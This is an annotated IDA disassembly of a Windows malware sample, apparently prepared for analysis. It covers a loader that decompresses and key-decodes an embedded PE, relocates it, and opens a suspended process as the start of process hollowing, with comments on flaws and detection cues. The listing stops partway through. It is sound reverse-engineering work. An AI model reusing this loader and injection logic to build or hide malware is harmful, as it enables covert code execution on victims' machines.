;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 09ED4D4717164FC830465A5F0627567E
; File Name : u:\work\09ed4d4717164fc830465a5f0627567e_orig.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00004FBD ( 20413.)
; Section size in file : 00005000 ( 20480.)
; Offset to raw data for section: 00000400
; Flags 60000020: Text Executable Readable
; Alignment : default
; OS type : MS Windows
; Application type: Executable 32bit
; unicode page, string, zero   (IDA helper macro)
; Emits STRING as 16-bit little-endian code units: each character byte is
; followed by the PAGE byte (the high byte of the code unit). When the
; optional third argument ZERO is present it is appended as a 16-bit
; terminator.
unicode macro page,string,zero
irpc c,<string>
db '&c', page ; one character, then its high byte -> UTF-16LE unit
endm
ifnb <zero>
dw zero ; optional 16-bit terminator
endif
endm
.686p ; P6 instruction set, privileged instructions permitted (IDA default)
.mmx ; enable MMX mnemonics
.model flat ; 32-bit flat model; cs/ds/es/ss cover one address space
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Execute
; .text is the only section in this listing (Flags 60000020 above): the
; hand-written loader routines come first, the MSVC CRT tail follows and
; is largely collapsed by IDA.
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
;-----------------------------------------------------------------------
; void *sub_401000(const void *compressed, DWORD compressedSize, DWORD *finalSize)
; Inflates an LZNT1-compressed blob through ntdll!RtlDecompressBuffer.
; ABI:   cdecl (the caller, sub_40171B, pops 0Ch)
; In:    arg_0 = compressed data, arg_4 = its size, arg_8 = receives
;        FinalUncompressedSize
; Out:   eax = malloc'd output buffer of arg_4*64h bytes, or NULL
; Clobb: ecx, edx, flags; ebx/esi/edi preserved
; Notes: ntdll is loaded with LoadLibraryA and both Rtl* exports are
;        resolved by name at run time instead of being imported - a
;        resolution pattern worth flagging in static triage.
;        The NTSTATUS from RtlDecompressBuffer is discarded, and the
;        output buffer is not freed on the three early-exit paths below.
;        Output capacity is a fixed 100x the compressed size; the decode
;        is bounded by that size, so an over-long payload is truncated
;        rather than overflowed.
;-----------------------------------------------------------------------
sub_401000 proc near ; CODE XREF: sub_40171B+A7p
var_10 = byte ptr -10h ; CompressBufferWorkSpaceSize (written, never read)
var_C = byte ptr -0Ch ; CompressFragmentWorkSpaceSize (written, never read)
var_8 = dword ptr -8 ; output buffer
var_4 = dword ptr -4 ; RtlDecompressBuffer
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
push edi
mov edi, [ebp+arg_4]
imul edi, 64h ; edi = compressedSize * 100 = output capacity
push edi ; Size
call _malloc
test eax, eax
pop ecx
mov [ebp+var_8], eax
jz short loc_401085 ; malloc failed -> NULL (ebx not pushed yet)
push ebx
push offset LibFileName ; "ntdll.dll"
call ds:LoadLibraryA ; LoadLibraryA
mov ebx, eax
test ebx, ebx
jz short loc_401082
push esi
mov esi, ds:GetProcAddress
push offset ProcName ; "RtlDecompressBuffer"
push ebx ; hModule
call esi ; GetProcAddress
push offset aRtlgetcompress ; "RtlGetCompressionWorkSpaceSize"
push ebx ; hModule
mov [ebp+var_4], eax
call esi ; GetProcAddress
cmp [ebp+arg_4], 0
pop esi
jz short loc_401082 ; zero-length input
cmp [ebp+var_4], 0
jz short loc_401082 ; RtlDecompressBuffer not resolved
test eax, eax
jz short loc_401082 ; RtlGetCompressionWorkSpaceSize not resolved
lea ecx, [ebp+var_C]
push ecx
lea ecx, [ebp+var_10]
push ecx
push 2 ; COMPRESSION_FORMAT_LZNT1
call eax ; RtlGetCompressionWorkSpaceSize(2, &var_10, &var_C); results unused
push [ebp+arg_8] ; FinalUncompressedSize
push [ebp+arg_4] ; CompressedBufferSize
push [ebp+arg_0] ; CompressedBuffer
push edi ; UncompressedBufferSize
push [ebp+var_8] ; UncompressedBuffer
push 2 ; CompressionFormat = LZNT1
call [ebp+var_4] ; RtlDecompressBuffer; NTSTATUS in eax is ignored
push ebx ; hLibModule
call ds:FreeLibrary ; FreeLibrary
mov eax, [ebp+var_8] ; return the output buffer
jmp short loc_401084
; ---------------------------------------------------------------------------
loc_401082: ; CODE XREF: sub_401000+2Bj
; sub_401000+4Cj ...
xor eax, eax ; failure -> NULL (var_8 leaked)
loc_401084: ; CODE XREF: sub_401000+80j
pop ebx
loc_401085: ; CODE XREF: sub_401000+19j
pop edi
leave
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
;-----------------------------------------------------------------------
; void sub_401088(int offset, int count)
; Copies COUNT bytes from dword_4082C4 + OFFSET (the in-memory payload,
; see sub_40171B) into the global staging buffer byte_4082E8.
; ABI:   cdecl; COUNT is treated as signed (jle/jl)
; Out:   nothing useful (eax = count on exit)
; Clobb: eax, ecx, edx, flags
; Note:  there is no check that COUNT fits byte_4082E8 (its size is not
;        visible here); callers pass sizes read from the embedded PE
;        headers, i.e. from the payload itself.
;-----------------------------------------------------------------------
sub_401088 proc near ; CODE XREF: sub_4010AD+5Bp
; sub_4010AD+B6p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
xor eax, eax ; i = 0
cmp [esp+arg_4], eax
jle short locret_4010AC ; count <= 0: nothing to copy
mov ecx, [esp+arg_0]
mov edx, dword_4082C4
add ecx, edx ; ecx = payload + offset
loc_40109C: ; CODE XREF: sub_401088+22j
mov dl, [ecx+eax]
mov byte_4082E8[eax], dl ; byte_4082E8[i] = src[i]
inc eax
cmp eax, [esp+arg_4]
jl short loc_40109C
locret_4010AC: ; CODE XREF: sub_401088+6j
retn
sub_401088 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
;-----------------------------------------------------------------------
; BOOL sub_4010AD(void *dosHdr, void *fileHdr, void *optHdr, void **sections)
; Decodes the PE headers of the embedded payload (dword_4082C4 +
; dword_408040) into caller-supplied buffers.
; ABI:   cdecl (WinMain pops 10h)
; In:    arg_0 -> 40h-byte IMAGE_DOS_HEADER out
;        arg_4 -> 18h-byte PE signature + IMAGE_FILE_HEADER out
;        arg_8 -> 0E0h-byte IMAGE_OPTIONAL_HEADER32 out
;        arg_C -> receives a new'd copy of the section table
; Out:   al = 1 on success; 0 if the payload is too short, e_magic is not
;        'MZ', or SizeOfOptionalHeader != 0E0h (PE32 only)
; Clobb: ecx, edx, flags; ebx/esi/edi preserved
; Payload layout as read here: 3 key bytes, then the PE image with its
; headers encoded. Header bytes are decoded in place in byte_4082E8 by
; adding byte_4082CC / byte_4082E0 (the negated first/second key bytes)
; to alternating positions, i.e. by subtracting the two key bytes.
; Section bodies are decoded later in sub_401313 with the third key.
; Notes: operator new's result is not NULL-checked, and byte_4082E8 is
;        written up to NumberOfSections*28h bytes plus a terminator with
;        no bound check (cf. sub_401088).
;-----------------------------------------------------------------------
sub_4010AD proc near ; CODE XREF: WinMain(x,x,x,x)+70p
var_13C = byte ptr -13Ch ; decoded IMAGE_OPTIONAL_HEADER32 (0E0h bytes)
Dst = word ptr -5Ch ; decoded IMAGE_DOS_HEADER (40h bytes); first word = e_magic
var_20 = dword ptr -20h ; Dst+3Ch = e_lfanew
var_1C = byte ptr -1Ch ; decoded PE signature + IMAGE_FILE_HEADER (18h bytes)
var_16 = word ptr -16h ; var_1C+6 = NumberOfSections
var_8 = word ptr -8 ; var_1C+14h = SizeOfOptionalHeader
var_4 = dword ptr -4 ; heap copy of the section table
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 13Ch
mov eax, dword_408040 ; eax = payload offset within the file buffer
mov ecx, dword_4082C4 ; ecx = file buffer
push ebx
push esi
lea esi, [ecx+eax] ; esi -> the 3 key bytes
mov bl, [esi]
mov byte_4082CC, bl
mov cl, [esi+1]
push edi
mov edi, nNumberOfBytesToRead
mov byte_4082E0, cl
mov cl, [esi+2]
neg byte_4082E0 ; byte_4082E0 = -key[1]
sub edi, eax ; edi = bytes available after the offset
neg bl ; bl = -key[0]
neg cl
cmp edi, 40h ; need at least a DOS header
mov byte_4082CC, bl ; byte_4082CC = -key[0]
mov byte_4082C0, cl ; byte_4082C0 = -key[2] (used by sub_401313)
jb loc_4011AB
add eax, 3 ; skip the key bytes
push 40h
push eax
call sub_401088 ; stage 40h encoded header bytes
pop ecx
pop ecx
mov byte_408328, 0 ; terminator right after the 40h staged bytes
xor esi, esi
loc_401118: ; CODE XREF: sub_4010AD+81j
; decode loop: even bytes get -key[0] (bl), odd bytes get -key[1]
mov cl, byte_4082E0
lea eax, dword_4082E9[esi] ; eax -> staged[esi+1]
add [eax-1], bl ; staged[esi] -= key[0]
add [eax], cl ; staged[esi+1] -= key[1]
inc esi
inc esi
cmp esi, 40h
jb short loc_401118
push 40h ; Size
mov ebx, offset byte_4082E8 ; ebx = staging buffer for the rest of the routine
lea eax, [ebp+Dst]
push ebx ; Src
push eax ; Dst
call _memcpy
add esp, 0Ch
cmp [ebp+Dst], 5A4Dh ; e_magic == 'MZ'?
jnz short loc_4011AB
mov eax, [ebp+var_20] ; eax = e_lfanew
lea ecx, [eax+18h]
cmp edi, ecx ; enough bytes for signature + file header?
jb short loc_4011AB
mov ecx, dword_408040
lea eax, [ecx+eax+3] ; offset + 3 + e_lfanew
push 18h
push eax
call sub_401088
pop ecx
pop ecx
mov byte_408300, 0 ; terminator after the 18h staged bytes
xor esi, esi
loc_401173: ; CODE XREF: sub_4010AD+E2j
; same two-key decode over 18h bytes
mov cl, byte_4082CC
lea eax, dword_4082E9[esi]
add [eax-1], cl
mov cl, byte_4082E0
add [eax], cl
inc esi
inc esi
cmp esi, 18h
jb short loc_401173
push 18h ; Size
lea eax, [ebp+var_1C]
push ebx ; Src
push eax ; Dst
call _memcpy
mov esi, 0E0h ; sizeof(IMAGE_OPTIONAL_HEADER32)
add esp, 0Ch
cmp [ebp+var_8], si ; SizeOfOptionalHeader must be 0E0h
jz short loc_4011B2
loc_4011AB: ; CODE XREF: sub_4010AD+4Fj
; sub_4010AD+9Dj ...
xor al, al ; failure
jmp loc_401298
; ---------------------------------------------------------------------------
loc_4011B2: ; CODE XREF: sub_4010AD+FCj
mov ecx, dword_408040
mov eax, [ebp+var_20]
lea eax, [ecx+eax+1Bh] ; offset + 3 + e_lfanew + 18h -> optional header
push esi
push eax
call sub_401088
pop ecx
pop ecx
mov byte_4083C8, 0 ; terminator after the 0E0h staged bytes
xor edi, edi
loc_4011D1: ; CODE XREF: sub_4010AD+13Fj
; two-key decode over 0E0h bytes
mov cl, byte_4082CC
lea eax, dword_4082E9[edi]
add [eax-1], cl
mov cl, byte_4082E0
add [eax], cl
inc edi
inc edi
cmp edi, esi
jb short loc_4011D1
push esi ; Size
lea eax, [ebp+var_13C]
push ebx ; Src
push eax ; Dst
call _memcpy ; its 0Ch of args are popped with the two calls below
movzx eax, [ebp+var_16]
lea eax, [eax+eax*4]
shl eax, 3 ; eax = NumberOfSections * 28h (sizeof IMAGE_SECTION_HEADER)
push eax ; dwBytes
call ??2@YAPAXI@Z ; operator new(uint)
movzx esi, [ebp+var_16]
mov ecx, dword_408040
mov [ebp+var_4], eax ; section table copy (NULL not checked)
mov eax, [ebp+var_20]
lea esi, [esi+esi*4]
shl esi, 3 ; esi = NumberOfSections * 28h
lea eax, [ecx+eax+0FBh] ; offset + 3 + e_lfanew + 18h + 0E0h -> section table
push esi
push eax
call sub_401088
add esp, 18h ; memcpy(0Ch) + operator new(4) + sub_401088(8)
xor ecx, ecx
test esi, esi
mov byte_4082E8[esi], 0 ; terminator after the staged section table
jbe short loc_40125D ; zero sections: nothing to decode
loc_401240: ; CODE XREF: sub_4010AD+1AEj
; two-key decode over the section table
mov dl, byte_4082CC
lea eax, dword_4082E9[ecx]
add [eax-1], dl
mov dl, byte_4082E0
add [eax], dl
inc ecx
inc ecx
cmp ecx, esi
jb short loc_401240
loc_40125D: ; CODE XREF: sub_4010AD+191j
push esi ; Size
push ebx ; Src
push [ebp+var_4] ; Dst
call _memcpy
mov edi, [ebp+arg_0]
mov eax, [ebp+arg_C]
add esp, 0Ch
push 10h
pop ecx ; ecx = 10h dwords = 40h bytes
push 6
lea esi, [ebp+Dst]
rep movsd ; *arg_0 = DOS header
mov edi, [ebp+arg_4]
pop ecx ; ecx = 6 dwords = 18h bytes
lea esi, [ebp+var_1C]
rep movsd ; *arg_4 = signature + file header
mov edi, [ebp+arg_8]
push 38h
pop ecx ; ecx = 38h dwords = 0E0h bytes
lea esi, [ebp+var_13C]
rep movsd ; *arg_8 = optional header
mov ecx, [ebp+var_4]
mov [eax], ecx ; *arg_C = section table
mov al, 1 ; success
loc_401298: ; CODE XREF: sub_4010AD+100j
pop edi
pop esi
pop ebx
leave
retn
sub_4010AD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
;-----------------------------------------------------------------------
; DWORD sub_40129D(int unused, IMAGE_FILE_HEADER *fh,
;                  IMAGE_OPTIONAL_HEADER32 *oh, IMAGE_SECTION_HEADER *sec)
; Computes the in-memory image size: SizeOfHeaders rounded up to
; SectionAlignment plus each section's VirtualSize rounded up the same
; way (sections with VirtualSize 0 add nothing).
; ABI:   cdecl (WinMain pops 10h); the argument at +8 is never read
; Out:   eax = total size; WinMain uses it as the VirtualAlloc length
; Clobb: ecx, edx, flags; ebx/esi/edi preserved
; Notes: divides by SectionAlignment with DIV, so a zero alignment in
;        the payload headers raises a divide error. The rounding here
;        duplicates sub_4012F9 inline.
;-----------------------------------------------------------------------
sub_40129D proc near ; CODE XREF: WinMain(x,x,x,x)+92p
arg_4 = dword ptr 0Ch ; -> IMAGE_FILE_HEADER
arg_8 = dword ptr 10h ; -> IMAGE_OPTIONAL_HEADER32; reused as the loop counter
arg_C = dword ptr 14h ; -> section table
push ebp
mov ebp, esp
mov eax, [ebp+arg_8]
mov ecx, [eax+3Ch] ; ecx = SizeOfHeaders
push esi
mov esi, [eax+20h] ; esi = SectionAlignment
xor edx, edx
mov eax, ecx
div esi ; eax = SizeOfHeaders / align, edx = remainder
test edx, edx
jz short loc_4012BA ; already aligned: keep ecx as is
lea ecx, [eax+1]
imul ecx, esi ; ecx = (quotient + 1) * align
loc_4012BA: ; CODE XREF: sub_40129D+15j
mov eax, [ebp+arg_4]
movzx eax, word ptr [eax+6] ; NumberOfSections
test eax, eax
jle short loc_4012F4
push ebx
mov ebx, [ebp+arg_C]
push edi
add ebx, 8 ; ebx -> sec[0].VirtualSize
mov [ebp+arg_8], eax ; sections remaining
loc_4012D0: ; CODE XREF: sub_40129D+53j
mov edi, [ebx] ; edi = VirtualSize
test edi, edi
jz short loc_4012EA ; empty section contributes nothing
xor edx, edx
mov eax, edi
div esi
test edx, edx
jnz short loc_4012E4
add ecx, edi ; exact multiple: add as is
jmp short loc_4012EA
; ---------------------------------------------------------------------------
loc_4012E4: ; CODE XREF: sub_40129D+41j
inc eax
imul eax, esi
add ecx, eax ; add the rounded-up size
loc_4012EA: ; CODE XREF: sub_40129D+37j
; sub_40129D+45j
add ebx, 28h ; next IMAGE_SECTION_HEADER
dec [ebp+arg_8]
jnz short loc_4012D0
pop edi
pop ebx
loc_4012F4: ; CODE XREF: sub_40129D+26j
mov eax, ecx
pop esi
pop ebp
retn
sub_40129D endp
; =============== S U B R O U T I N E =======================================
;-----------------------------------------------------------------------
; DWORD sub_4012F9(DWORD value, DWORD align)
; Rounds VALUE up to the next multiple of ALIGN (unsigned); returns
; VALUE unchanged when it already is a multiple.
; ABI:   cdecl
; Out:   eax
; Clobb: eax, edx, flags (ecx is untouched - sub_401313 relies on that)
; Note:  ALIGN == 0 raises a divide error.
;-----------------------------------------------------------------------
sub_4012F9 proc near ; CODE XREF: sub_401313+A9p
; sub_401313+12Dp ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
xor edx, edx
div [esp+arg_4] ; eax = value / align, edx = value % align
test edx, edx
jnz short loc_40130C
mov eax, [esp+arg_0] ; already aligned
retn
; ---------------------------------------------------------------------------
loc_40130C: ; CODE XREF: sub_4012F9+Cj
inc eax
imul eax, [esp+arg_4] ; (quotient + 1) * align
retn
sub_4012F9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_401313(int,int,size_t Size,int,void *Dst)
;-----------------------------------------------------------------------
; int __cdecl sub_401313(int, int, size_t Size, int, void *Dst)
; Lays the embedded payload out as a memory image in Dst: decoded headers
; at Dst, then each section's raw data at a running, alignment-rounded
; offset.
; In:    arg_4 -> IMAGE_FILE_HEADER; Size -> IMAGE_OPTIONAL_HEADER32
;        (IDA's name is misleading); arg_C -> section table; Dst ->
;        destination buffer (VirtualAlloc'd by WinMain, sized by
;        sub_40129D). The argument at +8 is unused.
; Out:   al = 1 always
; Clobb: ecx, edx, flags; ebx/esi/edi preserved
; Decoding: headers use the two alternating keys (byte_4082CC/byte_4082E0)
; exactly as sub_4010AD does; section bodies use only the third key,
; byte_4082C0, on every byte.
; Notes: section placement is the running sum of rounded VirtualSize in
;        table order, not each section's VirtualAddress, so the result
;        only matches a normal loader for images whose sections are
;        contiguous in RVA order. PointerToRawData values come from the
;        payload headers and are not range-checked against the buffer.
;-----------------------------------------------------------------------
sub_401313 proc near ; CODE XREF: WinMain(x,x,x,x)+D4p
arg_4 = dword ptr 0Ch
Size = dword ptr 10h ; optional header ptr; later reused for the per-section copy length
arg_C = dword ptr 14h
Dst = dword ptr 18h ; destination; later reused as the section index
push ebp
mov ebp, esp
mov eax, dword_4082C4
push ebx
push esi
mov esi, dword_408040
add eax, esi ; eax -> the 3 key bytes
mov bl, [eax]
mov byte_4082CC, bl
mov cl, [eax+1]
mov byte_4082E0, cl
mov al, [eax+2]
neg byte_4082E0 ; -key[1]
neg al
mov byte_4082C0, al ; -key[2]
mov eax, [ebp+Size]
neg bl
mov byte_4082CC, bl ; -key[0] (bl keeps it for the header decode)
push edi
mov edi, [eax+3Ch] ; edi = SizeOfHeaders
mov eax, [ebp+arg_4]
movzx eax, word ptr [eax+6] ; NumberOfSections
test eax, eax
jle short loc_401374
mov ecx, [ebp+arg_C]
add ecx, 14h ; ecx -> sec[0].PointerToRawData
loc_401366: ; CODE XREF: sub_401313+5Fj
; edi = min(SizeOfHeaders, smallest PointerToRawData)
mov edx, [ecx]
cmp edx, edi
jnb short loc_40136E
mov edi, edx ; (a zero PointerToRawData drives this to 0)
loc_40136E: ; CODE XREF: sub_401313+57j
add ecx, 28h
dec eax
jnz short loc_401366
loc_401374: ; CODE XREF: sub_401313+4Bj
push edi
add esi, 3 ; skip the key bytes
push esi
call sub_401088 ; stage edi encoded header bytes
pop ecx
xor esi, esi
test edi, edi
pop ecx
mov byte_4082E8[edi], 0 ; terminator
jbe short loc_4013A4
loc_40138D: ; CODE XREF: sub_401313+8Fj
; two-key header decode (bl = -key[0], cl = -key[1])
mov cl, byte_4082E0
lea eax, dword_4082E9[esi]
add [eax-1], bl
add [eax], cl
inc esi
inc esi
cmp esi, edi
jb short loc_40138D
loc_4013A4: ; CODE XREF: sub_401313+78j
push edi ; Size
push offset byte_4082E8 ; Src
push [ebp+Dst] ; Dst
call _memcpy ; headers -> Dst
mov ebx, [ebp+Size] ; ebx -> optional header
mov ecx, [ebx+20h] ; SectionAlignment
push ecx
push dword ptr [ebx+3Ch] ; SizeOfHeaders
call sub_4012F9
mov edi, eax
add edi, [ebp+Dst] ; edi = Dst + align_up(SizeOfHeaders) = first section
mov eax, [ebp+arg_4]
and [ebp+Dst], 0 ; section index = 0
add esp, 14h ; memcpy(0Ch) + sub_4012F9(8)
cmp word ptr [eax+6], 0 ; NumberOfSections == 0?
jbe loc_401472
mov esi, [ebp+arg_C]
add esi, 8 ; esi -> sec[i].VirtualSize
loc_4013E1: ; CODE XREF: sub_401313+159j
mov eax, [esi+8] ; SizeOfRawData
test eax, eax
jbe short loc_40144A
mov [ebp+Size], eax
mov eax, [esi]
cmp [ebp+Size], eax
jbe short loc_4013F5
mov [ebp+Size], eax ; copy length = min(SizeOfRawData, VirtualSize)
loc_4013F5: ; CODE XREF: sub_401313+DDj
mov eax, [esi+0Ch] ; PointerToRawData
mov ecx, dword_408040
push [ebp+Size]
lea eax, [eax+ecx+3] ; offset + 3 + PointerToRawData
push eax
call sub_401088 ; stage the encoded section bytes
mov eax, [ebp+Size]
pop ecx
pop ecx
xor ecx, ecx
test eax, eax
mov byte_4082E8[eax], 0 ; terminator
jbe short loc_40142E
loc_40141D: ; CODE XREF: sub_401313+119j
; single-key decode: every byte -= key[2]
mov dl, byte_4082C0
add byte_4082E8[ecx], dl
inc ecx
cmp ecx, eax
jb short loc_40141D
loc_40142E: ; CODE XREF: sub_401313+108j
push eax ; Size
push offset byte_4082E8 ; Src
push edi ; Dst
call _memcpy ; section data -> edi
mov ecx, [ebx+20h] ; SectionAlignment
push ecx
push dword ptr [esi] ; VirtualSize
call sub_4012F9
add esp, 14h ; sub_401088(8) + memcpy(0Ch) + sub_4012F9(8) minus the two pops above
jmp short loc_40145A
; ---------------------------------------------------------------------------
loc_40144A: ; CODE XREF: sub_401313+D3j
; no raw data: still advance by align_up(VirtualSize) when it is nonzero.
; ecx still holds SectionAlignment from the last "mov ecx, [ebx+20h]"
; (each memcpy is followed by that reload, and sub_4012F9 leaves ecx alone).
mov eax, [esi]
test eax, eax
jz short loc_40145C
push ecx
push eax
call sub_4012F9
add esp, 8
loc_40145A: ; CODE XREF: sub_401313+135j
add edi, eax ; edi += aligned section size
loc_40145C: ; CODE XREF: sub_401313+13Bj
mov eax, [ebp+arg_4]
movzx eax, word ptr [eax+6]
inc [ebp+Dst]
add esi, 28h ; next section header
cmp [ebp+Dst], eax
jl loc_4013E1
loc_401472: ; CODE XREF: sub_401313+C2j
pop edi
pop esi
mov al, 1 ; always reports success
pop ebx
pop ebp
retn
sub_401313 endp
; =============== S U B R O U T I N E =======================================
;-----------------------------------------------------------------------
; void sub_401479(int, int, IMAGE_OPTIONAL_HEADER32 *oh, int,
;                 BYTE *image, DWORD newBase)
; Applies the payload's base relocations inside the local image copy,
; adding (newBase - ImageBase) to every IMAGE_REL_BASED_HIGHLOW target.
; ABI:   cdecl (sub_4015A2 pops 18h); the args at 8, 0Ch and 14h are unused
; In:    arg_8 -> optional header (reloc directory at +88h/+8Ch,
;        ImageBase at +1Ch); arg_10 = local image buffer; arg_14 = new base
; Out:   nothing
; Clobb: eax, ecx, edx, flags; ebx/esi/edi preserved
; Notes: walks IMAGE_BASE_RELOCATION blocks until SizeOfBlock == 0. The
;        directory Size at +8Ch is only tested for zero and never used as
;        a bound, so a malformed table is walked past its end. Entry
;        types other than 3 (HIGHLOW) are skipped silently.
;-----------------------------------------------------------------------
sub_401479 proc near ; CODE XREF: sub_4015A2+BBp
arg_8 = dword ptr 0Ch
arg_10 = dword ptr 14h
arg_14 = dword ptr 18h
mov eax, [esp+arg_8]
mov ecx, [eax+88h] ; ecx = BaseReloc.VirtualAddress
test ecx, ecx
jz short locret_4014E7
cmp dword ptr [eax+8Ch], 0 ; BaseReloc.Size
jz short locret_4014E7
mov edx, [esp+arg_10]
push esi
mov esi, [esp+4+arg_14]
sub esi, [eax+1Ch] ; esi = delta = newBase - ImageBase
add ecx, edx ; ecx -> first IMAGE_BASE_RELOCATION in the local image
cmp dword ptr [ecx+4], 0 ; SizeOfBlock == 0: empty table
jz short loc_4014E6
push ebx
push edi
loc_4014A6: ; CODE XREF: sub_401479+69j
; per block: ecx -> {VirtualAddress, SizeOfBlock}; WORD entries follow at +8
mov eax, [ecx+4]
sub eax, 8
shr eax, 1 ; entry count = (SizeOfBlock - 8) / 2
test eax, eax
lea edi, [ecx+8] ; edi -> first entry
jle short loc_4014DC
mov ebx, eax ; ebx = entries remaining
loc_4014B7: ; CODE XREF: sub_401479+61j
xor edx, edx
mov dx, [edi] ; entry = type:4 | offset:12
mov eax, edx
and eax, 0FFFh ; offset within the page
add eax, [ecx] ; + block VirtualAddress
and dx, 0F000h ; type field
add eax, [esp+0Ch+arg_10] ; + image buffer -> patch site
cmp dx, 3000h ; IMAGE_REL_BASED_HIGHLOW?
jnz short loc_4014D7
add [eax], esi ; *(DWORD *)site += delta
loc_4014D7: ; CODE XREF: sub_401479+5Aj
inc edi
inc edi ; next entry
dec ebx
jnz short loc_4014B7
loc_4014DC: ; CODE XREF: sub_401479+3Aj
; edi now points just past this block = the next block header
cmp dword ptr [edi+4], 0
mov ecx, edi
jnz short loc_4014A6
pop edi
pop ebx
loc_4014E6: ; CODE XREF: sub_401479+29j
pop esi
locret_4014E7: ; CODE XREF: sub_401479+Cj
; sub_401479+15j
retn
sub_401479 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4014E8(LPSTR lpCommandLine,LPPROCESS_INFORMATION lpProcessInformation,LPCONTEXT lpContext,LPVOID lpBuffer)
;-----------------------------------------------------------------------
; int __cdecl sub_4014E8(LPSTR lpCommandLine, LPPROCESS_INFORMATION pi,
;                        LPCONTEXT ctx, LPVOID out)
; Starts lpCommandLine as a suspended process, captures the initial
; thread context, and reports where the new process's image is mapped:
; out[0] = image base read from the target's PEB, out[1] = size of the
; contiguous non-free region starting there.
; ABI:   cdecl (WinMain pops it together with the previous call)
; Out:   eax = 1 if CreateProcessA succeeded, else 0
; Clobb: ecx, edx, flags; ebx/esi/edi preserved
; Notes: STARTUPINFO.cb is left 0 instead of sizeof(STARTUPINFOA).
;        GetThreadContext, ReadProcessMemory and the final VirtualQueryEx
;        status are not checked, so out[] may be garbage while the
;        function still returns 1.
;        Detection note: CreateProcess(CREATE_SUSPENDED) followed at once
;        by GetThreadContext and a 4-byte ReadProcessMemory at PEB+8 is
;        the standard process-hollowing prelude.
;-----------------------------------------------------------------------
sub_4014E8 proc near ; CODE XREF: WinMain(x,x,x,x)+EFp
StartupInfo = _STARTUPINFOA ptr -64h
Buffer = _MEMORY_BASIC_INFORMATION ptr -20h
NumberOfBytesRead= dword ptr -4
lpCommandLine = dword ptr 8
lpProcessInformation= dword ptr 0Ch
lpContext = dword ptr 10h
lpBuffer = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 64h
push esi
mov esi, [ebp+lpProcessInformation]
push edi
push 10h
pop ecx ; ecx = 10h dwords
xor edx, edx
push esi ; lpProcessInformation
xor eax, eax
mov [ebp+StartupInfo.cb], edx ; cb = 0 (not sizeof)
lea edi, [ebp+StartupInfo.lpReserved]
rep stosd ; zero the remaining 40h bytes of STARTUPINFOA
lea eax, [ebp+StartupInfo]
push eax ; lpStartupInfo
push edx ; lpCurrentDirectory
push edx ; lpEnvironment
push 4 ; dwCreationFlags = CREATE_SUSPENDED
push edx ; bInheritHandles
push edx ; lpThreadAttributes
push edx ; lpProcessAttributes
push [ebp+lpCommandLine] ; lpCommandLine
push edx ; lpApplicationName
call ds:CreateProcessA ; CreateProcessA
test eax, eax
jz short loc_40157F
mov edi, [ebp+lpContext]
push ebx
push edi ; lpContext
mov dword ptr [edi], 10007h ; ContextFlags = CONTEXT_FULL (x86)
push dword ptr [esi+4] ; hThread
call ds:GetThreadContext ; GetThreadContext (result ignored)
mov ebx, [ebp+lpBuffer]
lea eax, [ebp+NumberOfBytesRead]
push eax ; lpNumberOfBytesRead
mov eax, [edi+0A4h] ; CONTEXT.Ebx: on 32-bit Windows the first thread starts with Ebx = PEB
push 4 ; nSize
push ebx ; lpBuffer
add eax, 8 ; PEB+8 = ImageBaseAddress
push eax ; lpBaseAddress
push dword ptr [esi] ; hProcess
call ds:ReadProcessMemory ; ReadProcessMemory (result ignored)
mov edi, [ebx] ; edi = target image base
mov ebx, ds:VirtualQueryEx
jmp short loc_401562
; ---------------------------------------------------------------------------
loc_401556: ; CODE XREF: sub_4014E8+87j
cmp [ebp+Buffer.State], 10000h ; MEM_FREE ends the mapped range
jz short loc_401571
add edi, [ebp+Buffer.RegionSize] ; next region
loc_401562: ; CODE XREF: sub_4014E8+6Cj
push 1Ch ; dwLength = sizeof(MEMORY_BASIC_INFORMATION)
lea eax, [ebp+Buffer]
push eax ; lpBuffer
push edi ; lpAddress
push dword ptr [esi] ; hProcess
call ebx ; VirtualQueryEx
test eax, eax
jnz short loc_401556 ; loop until the query fails or a free region is hit
loc_401571: ; CODE XREF: sub_4014E8+75j
mov eax, [ebp+lpBuffer]
sub edi, [eax]
pop ebx
mov [eax+4], edi ; out[1] = end - base
xor eax, eax
inc eax ; return 1
jmp short loc_401581
; ---------------------------------------------------------------------------
loc_40157F: ; CODE XREF: sub_4014E8+32j
xor eax, eax ; CreateProcessA failed -> 0
loc_401581: ; CODE XREF: sub_4014E8+95j
pop edi
pop esi
leave
retn
sub_4014E8 endp
; =============== S U B R O U T I N E =======================================
;-----------------------------------------------------------------------
; BOOL sub_401585(IMAGE_OPTIONAL_HEADER32 *oh)
; Returns 1 when the base-relocation directory (DataDirectory[5] at
; +88h/+8Ch) has both a nonzero VirtualAddress and Size, else 0.
; ABI:   cdecl
; Clobb: eax, flags
;-----------------------------------------------------------------------
sub_401585 proc near ; CODE XREF: sub_4015A2+83p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
